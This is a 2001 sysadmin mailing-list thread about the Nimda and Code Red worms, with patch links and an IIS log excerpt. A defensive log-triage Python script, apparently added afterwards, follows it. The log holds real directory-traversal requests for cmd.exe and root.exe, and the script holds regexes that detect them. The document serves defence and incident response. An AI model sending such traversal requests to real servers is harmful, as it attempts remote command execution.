Gentlemen, there is a worm/virus out there and it is called Nimda (ADMIN backwards). It propagates via email, web servers and browsers. Merely previewing it puts you in the sack. You can take a look at these links and patch up ASAP. It wreaks havoc.

Visit the CERT site and read the article on Nimda:
http://www.cert.org/body/advisories/CA200126_FA200126.html

You are also advised to visit the Microsoft website:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
and download and install this patch. If you already have the Security Rollup Package then you are protected. The same goes for the IIS Lockdown Tool: if you have it configured in Default mode you are also protected.

The worm/virus is a follow-up to Code Red, except that it propagates via email, browsers, web servers, and connecting to ordinary NT shares. If you are hit I advise you isolate that box/segment first and then decide on a strategy to eliminate the virus. The stuff in the previous message is the footprint of the virus.

Antivirus Vendor Information

Data Fellows Corp
http://www.datafellows.com/v-descs/nimda.shtml
McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=99209&
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec
http:[EMAIL PROTECTED]
Trend Micro
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A

You may wish to visit the CERT/CC's computer virus resources page located at
http://www.cert.org/other_sources/viruses.html

-----Original Message-----
From: David B. Lunn [mailto:[EMAIL PROTECTED]]
Sent: 19 September 2001 07:34
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Why would you put a link to an infected site? If someone does not have Sept 18th patterns???? They will immediately be infected???

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Here is a site that has been hit: http://216.39.178.32

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the Code Red 2 methods of attacking the more local subnets.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert

Yes. It seems to be systems I have previously monitored hitting me with CodeRed attacks. I bet someone is activating all of their children.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]

-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert

All my public-facing web servers at home and at my office have shown huge continuous hacking activity. Has anyone seen similar? I fear this may be Code Red related or automated. Please comment if you have seen similar.
Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe , /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe , /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe , /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe , /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Confidential: This e-mail and any files transmitted with it are the property of Lanco International and/or its affiliates, are confidential, and are intended solely for the use of the individual or entity to whom this e-mail is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender at the above e-mail address and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing or copying of this e-mail is strictly prohibited.
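The log excerpt above is the "footprint" the first message refers to: repeated requests for cmd.exe and root.exe through /scripts, /MSADC, /_vti_bin, /_mem_bin and the /c and /d paths, with "..%5c" and "..%2f" traversal, every one answered 404 or 500. What an admin reading this thread needs is a quick way to split that traffic into failed probes (the source is probably an infected host scanning you) and probes that were actually served (your own box is now the infected host and should be isolated, as the thread advises). The following triage script is an added example written for this editing pass; it is not code from the original posts or from any of the vendors linked above. It assumes the 15-field comma-separated Microsoft IIS log format the excerpt uses, takes four lines from the excerpt as sample input, and adds one constructed line (source 192.0.2.10, a documentation address) with a 200 status to exercise the "served" branch. Win32 status 3 and 87 are decoded using the standard ERROR_PATH_NOT_FOUND and ERROR_INVALID_PARAMETER meanings.

```python
"""Triage helper for IIS-format logs showing Code Red II / Nimda style probes.

Added example, not part of the mailing-list thread. Parses the 15-field
"Microsoft IIS log format" lines, flags cmd.exe / root.exe requests, and
summarises per source address whether any probe was served (HTTP 200) or
only failed (404 / 500).
"""
import re
from collections import defaultdict

# Field order of the Microsoft IIS log format used in the excerpt.
FIELDS = [
    "client_ip", "user", "date", "time", "service", "server", "server_ip",
    "time_taken", "bytes_in", "bytes_out", "status", "win32_status",
    "method", "target", "params",
]

# Targets the worm traffic in the thread asks for: cmd.exe, or root.exe,
# which the excerpt shows being probed under /scripts and /MSADC.
PROBE_TARGET = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)

# Encoded or literal "../" used to escape the virtual directory. U+FFFD
# covers the bytes the list archive rendered as "\ufffd" in the excerpt.
TRAVERSAL = re.compile(r"(\.\.%5c|\.\.%2f|\.\./|\.\.\ufffd)", re.IGNORECASE)

# Win32 status codes that appear in the excerpt (standard Win32 error names).
WIN32 = {"0": "OK", "3": "ERROR_PATH_NOT_FOUND", "87": "ERROR_INVALID_PARAMETER"}


def parse_iis_line(line):
    """Split one IIS-format line into a dict; None if the field count is off."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(rec):
    """Return a probe record for worm-style requests, None for ordinary traffic."""
    target = rec["target"]
    if not PROBE_TARGET.search(target):
        return None
    return {
        "client_ip": rec["client_ip"],
        "time": rec["time"],
        "target": target,
        "traversal": bool(TRAVERSAL.search(target)),
        "status": rec["status"],
        "win32": WIN32.get(rec["win32_status"], rec["win32_status"]),
        # A 200 means IIS handed the request to the command interpreter:
        # treat the server as compromised and isolate it, as the thread advises.
        "served": rec["status"] == "200",
    }


def triage(lines):
    """Summarise probes per source address over an iterable of log lines."""
    summary = defaultdict(
        lambda: {"probes": 0, "traversal": 0, "served": 0, "targets": set()})
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        probe = classify(rec)
        if probe is None:
            continue
        s = summary[probe["client_ip"]]
        s["probes"] += 1
        s["traversal"] += probe["traversal"]
        s["served"] += probe["served"]
        s["targets"].add(probe["target"])
    return dict(summary)


# Four lines from the thread's excerpt, one ordinary request, and one
# CONSTRUCTED line (192.0.2.10) with a 200 status to show the served branch.
SAMPLE_LOG = """\
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
192.0.2.10, -, 9/18/01, 10:40:00, W3SVC4, DC1DIIS01, x.x.x.x, 31, 96, 1842, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
"""

if __name__ == "__main__":
    for ip, s in sorted(triage(SAMPLE_LOG.splitlines()).items()):
        verdict = "ISOLATE: probe served" if s["served"] else "failed probes only"
        print(f"{ip}: {s['probes']} probes, {s['traversal']} with traversal, {verdict}")
```

Run it as-is to see the two verdicts; on a real server, feed it the W3SVC log file line by line instead of SAMPLE_LOG. The per-source "failed probes only" addresses are the ones worth reporting to their owners, which is what the thread's participants were seeing from each other.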
